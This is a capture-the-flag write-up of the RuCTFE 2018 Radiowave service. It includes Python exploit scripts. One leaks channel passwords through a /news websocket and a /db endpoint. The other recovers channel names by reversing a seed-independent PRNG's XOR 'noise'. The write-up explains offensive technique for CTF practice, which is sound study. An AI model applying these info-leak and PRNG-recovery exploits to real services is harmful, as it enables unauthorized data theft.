Saarsec

saarsec

Schwenk and pwn

RuCTFE 2018 WriteUp Radiowave

The Radiowave service consisted of three components: a static Web site just connecting to Websockets, a Rust “database”, and a “Transmitter library” in DotNet. The relation between the components was enabled by nginx. In essence, any request to http://vuln:7777/radio/* was passed to local port 17779 (running the Transmitter), /news went to port 17777 (a Websocket opened by the Rust DB to announce new public channels), and POST and GET to /db/* also went to the Rust service. The database itself was implemented in Rust as a HashMap and a thorough investigation did not reveal any obvious bugs (feel free to correct us there). The static Web site also contained nothing interesting, we only learned that when a message was added to any channel in the form, an outgoing request to /radio/<channel> was made and as the result, the browser would play the morse equivalent of the message.

Flaw #1: Posting public flags

For a very long time, no team seemed to score on Radiowave. According to the traffic for our team, the gameserver changed behaviour at 17:29 our time (16:29 UTC). Starting from that point in time, every 10 minutes the gameserver posted flags as such:

POST /db/giw7-k6v9-bho6 HTTP/1.1

{"frequency": 1508, "is_private": true, "password": "X2Y6736WVUBM5WO0ZYVP742ADB9CF49=", "dpm": 543, "text": "DEEP MAN BUILDS", "need_base32": false}

followed by a second request (notice the changed value for is_private!)

POST /db/giw7-k6v9-bho6 HTTP/1.1

{"frequency": 413, "dpm": 625, "need_base32": false, "text": "INFAMOUS FAMILY CONVINCES", "is_private": false, "password": "X2Y6736WVUBM5WO0ZYVP742ADB9CF49="}

The POST invokes the Rust database, creating that particular channel in the HashMap on the first request, and updating it on the second request. If we look at the code of this (specifically, database/src/database.rs), we observe the following code which is called when data is added to the DB:

pub fn add(&self, key: String, mut value: Message) -> Vec<Message> {
    if !self.database.contains_key(&key) {
        self.database.insert(key.clone(), Vec::new());
        if !value.is_private {
            info!("Broadcasting '{}'", &key);
            match self.ws_broadcaster.broadcast(key.clone()) {
                Ok(_) => (),
                Err(e) => error!("{:?}", e)
            }
        }
    }
    // function continues here

So, whenever a message is added to a channel, the channel information is broadcast via the ws_broadcaster, which is the /news Websocket endpoint discussed earlier. Ok, now that we have the channel name, what do we do with it? Since the Transmitter itself also must be somehow able to get the message from the Rust database, that database implements a GET /db/channel endpoint (reachable also from the outside), which returns as a JSON list of all message belonging that channel, including the password used to “secure” it. Our exploit simply abused that fact (using Python 3 websockets)

def on_message(ws, message):
    team = ws.url.split("/")[2]
    messages = requests.get("http://%s/db/%s" % (team, message)).json()
    for message in messages:
        submit(messages["password"])

def exploit(target):
    ws = websocket.WebSocketApp("ws://%s:7777/news" % target,on_message=on_message)
    ws.run_forever()

We got the exploit working from around 18:10 our time, and managed to score 845 flags using it.

Flaw #2: What the fuck!

After the CTF, one thing kept bugging us, especially looking at the traffic: Given that there were three ways in which the gameserver stored flags (password of the channel, the name of the channel, and the message posted into that channel), there could simply not just be a single flaw which would allow you to steal at most 1/3 of the flags. Moreover, the behavioural change in the checker implied that this was a measure from the organizers to ensure that at least some flags would be stolen. Knowing this, there had to be a second flaw. We first considered that an outdated Rust compiler with known flaws could have been used, but quickly ruled that out.

So, instead we focussed on the Transmitter. First, let us give a brief overview of what it does. When a client connects to the radio Websocket, the Transmitter connects to the Rust database (via HTTP, as mentioned above) and gets the stored information of all messages on that channel. As visible above, this is the message as well as frequency and dpm. In a first step, the message is then mapped from characters to morse “characters”, that is, a sequence of dots and dashes. This mapping is stored in Transmitter/mappings/chars. Next, the morse code is converted to a sequence of signal and silence (in essence). So, to give an example: the character E is a single dot in morse code. A dot is represented as the sequence Signal|Silence, and for every morsed character, a delimiter Silence|Silence is added. Hence, if we just morse and E, this conversion yields Signal|Silence|Silence|Silence. Next up, this sequence is converted into audio signal using Pulse Code Modulation (PCM). This is shown below (in SignalToPCMConverter.cs as “unpacked” from the DLL using dotPeek):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
public bool MoveNext()
{
  if (this.timeDot > this.dotDuration)
  {
    if (!this.signals.MoveNext())
      return false;
    this.timeDot = 0.0;
  }
  this.phi += this.dphi;
  this.timeDot += this.dt;
  switch (this.signals.Current)
  {
    case Signals.Silence:
      this.Current = 0.0;
      break;
    case Signals.Signal:
      this.Current = Math.Sin(this.phi);
      break;
    default:
      this.Current = NoiseGenerator.Get();
      break;
  }
  return true;
}

This is also the first time dpm and frequency are used, specifically to calculate dphi and dotDuration: Signal is converted into a sinewave “beep”, Silence becomes actual silence, and everything else is converted to “noise”. frequency controls the pitch of the beep, and dpm controls how many audio samples correspond to a morse character. The result of this passed to the MixConverter, which mixes together all messages in a given channel by dividing the individual audio signals by eight, as shown below:

public bool MoveNext()
{
  this.Current = 0.0;
  bool flag = false;
  foreach (KeyValuePair<Message, MessageGenerator> generator in this.generators)
  {
    if (generator.Value.MoveNext())
      flag = true;
    this.Current += generator.Value.Current / 8.0;
  }
  return flag;
}

Finally, the result of the mixing stage is used in the Channel class to send the data to client on the Websocket. Since at this point, Current is a floating point, the data needs to be converted to bytes to be sent. This is done by mapping the range [-1, 1] to [0, 1] (adding one and dividing by two), and finally mapping this to [0, 255] by multiplying with byte.MaxValue (in Transmitter.WebSockets.Channel.PrepareAndSendAsync):

for (int index = 0; index < channel.buffer.Length; ++index)
  {
    channel.mixer.MoveNext();
    channel.buffer[index] = (byte) ((channel.mixer.Current + 1.0) / 2.0 * (double) byte.MaxValue);
  }

Since a signal is a sine wave (see line 17 of the snippet above), the value coming out of this will always be between -1 and 1, and silence is mapped to 0. Assuming there is only a single message on the channel, that means that after mixing we are left with values for signal between -1/8 and 1/8, and silence is stil 0. After the first mapping step this becomes a value between 7/16 and 9/16 for signal and a value of 1/2 for silence. Finally, mapping this to bytes, we end up with the signal going up and down between byte value 111 and 143, whereas silence is always exactly 127.

So, is there a flaw here?

Turns out, there is: looking at line 19 and 20 in the above code snippet, we find that there is a Default case when we are processing the Signal/Silence sequence. This already seems weird. It turns out that when looking at the way that characters are mapped to dashes and dots, any character that is not in the map will yield an MorseChars.Err.

private static MorseChars ParseMorse(char ch)
{
  if (ch == '-')
    return MorseChars.Dash;
  return ch == '.' ? MorseChars.Dot : MorseChars.Err;
}

So, when the services tries to morse something for which it does not know a mapping, we fall through to the default case in line 20. So, what is the NoiseGenerator then? The code reveals that noise is the result of a XOR operation of two things, the current value of a StringlfinityEnumerator and a “random” value:

public static double Get()
{
  StringlfinityEnumerator.MoveNext();
  return (double) ((ulong) StringlfinityEnumerator.Current ^ Random.Next()) / 64.0;
}

StringlfinityEnumerator: cycling through pooled channels

We already spotted what appears to be a typo in the StringlfinityEnumerator class name. Let’s have a look at that class to get a feeling for what it does.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
public static class StringlfinityEnumerator
{
    private static readonly IDictionary<string, Channel> value = (IDictionary<string, Channel>) typeof (Channels).GetField("ChannelsPool", (BindingFlags) 40).GetValue((object) null);
    [ThreadStatic]
    private static StringlfinityEnumerator.StringlfinityEnumeratorState state;
    [ThreadStatic]
    private static IEnumerator<KeyValuePair<string, Channel>> enumerator;

    public static bool MoveNext()
    {
      // omitted here to not have even more code snippets.
    }

    public static byte Current
    {
      get { return (byte) StringlfinityEnumerator.state.Current;}
    }

    private class StringlfinityEnumeratorState
    {
      private string str;
      private int pos;
      private char current;

      public bool MoveNext()
      {
        if (this.str == null || this.pos >= this.str.Length + 16)
          return false;
        ++this.pos;
        this.current = this.pos >= this.str.Length ? char.MinValue : this.str[this.pos];
        return true;
      }

      public string Str
      {
        set
        {
          this.str = value;
          this.pos = 0;
        }
      }
     }
// ...
}

This chunk of code shows a number of interesting things: first, the value in line 3 is a dictionary which copies the ChannelsPool from Channels. This is a mapping of the channels that have been requested recently. Second, we find two [ThreadStatic] variables, the state and enumerator (meaning that these are static, but each thread has its own version). We omit here exactly what MoveNext() does, but in essence it cycles through the keys of the value dictionary, that is the names of the channels. When enumerating over a single channel, the state comes into play. Here, we find the MoveNext starting from line 25. This checks if the string is currently null or the internal variable pos is more than the length of the string plus 16. In line 30 we see that the current character is either the character at a given offset in the string, or, importantly, just a null byte (char.MinValue) if pos is outside the string length.

Essentially, the whole Enumerator yields an endless string, consisting of the name of each channel in the ChannelPool, followed by 16 null bytes. To be more precise, however, we must note that the first character of each channel is omitted: In line 29, we see that pos is incremented once (and initially set to 0, see line 39) before the current char is copied. Hence, we only get the channel name from the second byte onwards.

Random: not really so random

The second component to the puzzle is the Random class (in Transmitter.Utils). We first show the code and then explain what happens here.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
namespace Transmitter.Utils
{
  public static class Random
  {
    private static readonly Random.RandomInternal rnd = new Random.RandomInternal((ulong) DateTime.UtcNow.Ticks);
    [ThreadStatic]
    private static Random.RandomInternal random;

    public static ulong Next()
    {
      if (Random.random == null)
      {
        lock (Random.rnd)
          Random.random = new Random.RandomInternal(Random.rnd.Next());
      }
      return Random.random.Next();
    }

    private class RandomInternal
    {
      private byte a = 1;
      private byte b = 5;
      private byte c = 7;
      private readonly byte[] state;

      public RandomInternal(ulong seed)
      {
        seed ^= 4942627532835661029UL;
        this.state = new byte[8];
        int num = 0;
        while (num < 64)
        {
          this.state[num >> 3] = (byte) (seed >> num);
          num += 8;
        }
      }

      public ulong Next()
      {
        this.Move();
        return (ulong) this.state[(int) this.c];
      }

      private void Move()
      {
        this.Move(ref this.a);
        this.Move(ref this.b);
        this.Move(ref this.c);
        this.state[(int) this.c] = (byte) ((uint) this.state[(int) this.a] + (uint) this.state[(int) this.b]);
      }

      private void Move(ref byte pos)
      {
        ++pos;
        if ((int) pos != this.state.Length)
          return;
        pos = (byte) 0;
      }
    }
  }
}

First, we see that in line 5, and instance of RandomInternal is created, using the current timestamp as the seed. This seed is then mangled (line 28) and used to build the initial state of this PRNG. Just by looking at the RandomInternal.Next() (line 38) function we can already observe one very important thing: the PRNG always returns exactly one byte.

However, our code above was not calling into RandomInternal, but into Random.Next() (lines 9-17). We see here that if the (again [ThreadStatic]) Random.random is not yet set, we initialize an instance of the class itself, using the outcome of RandomInternal as the seed. This already screams bug: since the PRNG only returns a single byte, there are only 256 different seeds with which a thread’s PRNG could have been initiliazed. We first thought this meant we might have to brute-force the correct one later on, but it turns out this is even easier: In the constructor, we observe a XOR with a long number (line 28). In the loop, starting from line 31, the internal state is then just initialized to this XOR result. As we only have a single byte seed, XORing with the seed will only affect the lowest byte, which becomes this.state[0]. So, regardless of what our seed was, it will only have affected state[0], but never any other part of the state.

Let’s now have a look at the functions Next (line 38) and Move (line 44). Before handing out the first byte of randomness, the PRNG updates its internal state, but not before incrementing the internal variables a, b, and c though (originally 1, 5, and 7). So, in the first round, c is set to 0, a to 2, and b to 6. Next, in line 49, the state is updated as state[0] = (state[2] + state[6]) % 256. The result is then returned in line 41. Recall that only the initial state[0] depended on the seed at all and is overwritten before it could be used for the first time. So, in essence, this PRNG always produces the exact same “random” output regardless of what the seed was. Moreover, as our tests later showed, after 1792 rounds, we are back to the initial state, so the keystream for our XOR even has a fixed size.

Combining the flaws

So, we know that the “noise” generated on the channel in case we have asked the service to morse an unmapped character is in fact a XOR of the cycling through all channel names and the output of the broken PRNG. However, we have to come back to the final modulation step for a second: For a morse signal, we said that the signal values are between -1 and 1. For our noise, however, the result of the XOR (potentially ranging from 0 to 255) is divided by 64. In the mixing step, this is again divided by 8, meaning that the resulting “signal” (before the modulation to a byte) will range between 0 and 0.5. This yields a problem for our attack. Recall from above:

channel.buffer[index] = (byte) ((channel.mixer.Current + 1.0) / 2.0 * (double) byte.MaxValue);

Let’s say that the generated noise was the byte 1. This would result in a signal of (1/64.0)/8.0 = 0.001953125 before the transformation to bytes. Now, we add 1, divide by 2.0 and multiple it with 255, so 1.001953125 / 2.0 * 255.0 = 127.7490234375. If we now consider the byte was initially 2, the result is 1.00390625 / 2.0 * 255.0 = 127.998046875. Since conversion of a floating point to a byte just cuts of the decimals, those two values will map to the same byte value in the output stream. In particular, we always have 4 inputs that map to the same byte output.

Thus, even if we know the XOR key used, we still have 4 different choices for which character it was xored with. We can solve this, though: As the channel names repeat over and over again, chances are that a character of a given channel is XORed with a different byte on its second occurence. Let us try and explain this based on a example: Let us assume that the first character in a channel name was an “A” and the key at that offset was a “B” the first time around. The result of that XOR operation is 3, which maps to 128 in the output. However, the values 4, 5, and 6 also map to 128. So, knowing the XOR key “B” and the byte output 128, possible values are "B" ^ 3 = "A", "B" ^ 4 = "F", "B" ^ 5 = "G", and "B" ^ 6 = "D". Let’s now also assume that the second time we got the XORed channel name, the key was “1”. "A" ^ "1" = 112, which maps to byte 155. Since also 111, 113, and 114 map to 134, possible original values are "1" ^ 112 = "A", "1" ^ 111 = "^", "1" ^ 113 = "@", and "1" ^ 114 = "C". If we now build the intersection between the possible values, we see that only A occurs in both sets, therefore this must be the correct character.

I promise, we are almost there. We have two more challenges to solve though: Recall that both the PRNG and the channel cycler are [ThreadStatic], i.e., every thread has its own static instance. If every request were to be served by a fresh thread this would be ideal, as we would then have perfect knowledge over the initial states of both. However, instead a threadpool of 128 threads is used. That though means, that we do not know what the internal state of those two look like upfront, as “our” thread could have served other requests before. Therefore, we a) need to synchronize our keystreams and b) need to know when we restarted the list of available channels. For this, the 16 null bytes come in handy. We know that after each channel name, we are XORing the key from the PRNG with 0. So, in the output we receive, there will be a sequence of 16 bytes which exactly match the key stream (after applying the transformation to the bytes as above). Once we find that overlap, we can calculate the offset the server had in the keystream. So, the first half of our exploits looks like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
def mapchar(n):
    return int(((((n / 64.0) / 8.0) + 1) / 2.0) * 255)

def main():
    prng = PRNG(0)
    mapping = collections.defaultdict(list)
    for n in xrange(256):
        mapping[mapchar(n)].append(n)

    channel = set_message("<", 1000, 1)
    ws = websocket.create_connection("ws://127.0.0.1:7777/radio/%s" % channel)
    data = ws.recv()

    noise_stream = []
    options = []

    for i in xrange(0, len(data)):
        original = ord(data[i])
        noise_stream.append(original)
        options.append(mapping[original])

    key_stream = [prng.next() for _ in xrange(1792)]
    mapped_key_stream = map(mapchar, key_stream)

    for i in xrange(0, 1792 - 16):
        ks_slice = mapped_key_stream[i:i + 16]
        location = next((j for j in xrange(128-16) if noise_stream[j:j+16] == ks_slice), -1) 
        if location != -1:
            offset = i - location
            break
    else:
        raise Exception("offset not found")

Here, prng is our Python reimplementation of the PRNG from the DLL. set_message just creates a new channel, in this case setting the message to < (not mapped to morse), with a frequency set to 1000 and dpm to 1. The frequency is irrelevant for us, and the low value for dpm means that a single character will “last” long enough to retrieve 8000 bytes. In the loop starting in line 17, we create a stream of the “noise” converted to integers, and for each position append the possible chars (using the mapchar function) in that position. Next, we get a key stream (line 22) and also map that using the mapchar function. In the loop starting from line 25, we iterate over the entire keystream and always take 16 bytes from offset i. Next, we try to find the first position in the first 128 bytes of our noise_stream that is equal to these 16 keystream bytes. Since channels were always shorter than this, it is guaranteed that we can find at least one occurrance of the 16 XORed null bytes in there. Finally, when for a given i we could detect an overlap, we can take its location and subtract that from our own offset i.

As the final step, we need to extract the channels. Since channel names are always separated by 16 null bytes, we can spot them easily in the stream. In particular, if \x00 is a valid option for a byte at a certain offset, we know that a channel name has ended. If this is not the case, we can simply accumulate the possible characters at that offset (line 10). Once we find the end of the name, we append the accumulated options to a list of chunks (line 7), and reset the array (line 8)

1
2
3
4
5
6
7
8
9
10
    tmp_chunk = []
    chunks = []
    for i, element in enumerate(options):
        possible_chars = [chr(option ^ key_stream[(i + offset) % 1792]) for option in element]
        if "\x00" in possible_chars:
            if len(tmp_chunk):
                chunks.append(tmp_chunk)
                tmp_chunk = []
            continue
        tmp_chunk.append(possible_chars)

Finally, since we do not know the internal state of the Channel cycler, the first chunk we received could have started in the middle of a channel name. To not have any issues with that, we decided to drop the first element. Next, we cycle through all following chunks until we find one that could be the same. “Could” in this case refers to the fact that both chunks have the same length, and at each n-th entry of possible characters have an overlap of at least one. In Python, this looks as follows:

def chunks_overlap(chunk1, chunk2):
    if len(chunk1) != len(chunk2):
        return False
    for a, b in zip(chunk1, chunk2):
        if not set(a) & set(b) & set(string.printable):
            return False
    return True


def calc_overlap(chunk1, chunk2):
    tmp_chunk = []
    if not chunks_overlap(chunk1, chunk2):
        return []
    for a, b in zip(chunk1, chunk2):
        tmp_chunk.append(list(set(a) & set(b) & set(string.printable)))
    return tmp_chunk

Since we were playing around with very short channel names, we decided to build in a second check. In particular, when we found a potential overlap between the first chunk and the i-th chunk (line 5), we also determine if the second chunk and i+1-th overlap (line 6). Once we have that, we know the total number of channels in the list n. Then, for each n-th entry in the chunks, we can simply apply the calc_overlap function to the possible characters (as discussed above) and get the final list of channels that someone recently listened to.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
    chunks = chunks[1:]
    first_chunk = chunks[0]

    for i in xrange(1, len(chunks)):
        if chunks_overlap(first_chunk, chunks[i]):
            if chunks_overlap(chunks[1], chunks[i + 1]):
                channels = i
                break
    else:
        raise Exception("No channels found")

    print "Found %d channels" % channels

    result = chunks[0:channels]
    for i in xrange(channels, len(chunks)):
        result[i % channels] = calc_overlap(result[i % channels], chunks[i])

    for element in result:
        print "".join(c for p in element for c in p)

Technically, as a last step before stealing any flags with this, we would have had to bruteforce the first character of the channel name. That would have been trivial, though, so we omit this here :)

Discussion

If you have made it here, congratulations! While eventually solving the challenge provided a sense of achievement, it is very unclear if this could have been done in 8 hours. The idea itself was really clever, but we easily spent 12 person hours on this. Moreover, this was after some of our teammates told us that there was something fishy in the code accessing the ChannelsPool. Given the change in the gameserver logic, it would appear that the RuCTFE organizers will likely agree that this exploit might have been a bit too hard to do in practice. As they made all the traffic available, we can definitely have a look at whether someone even remotely attempted this in the CTF :-)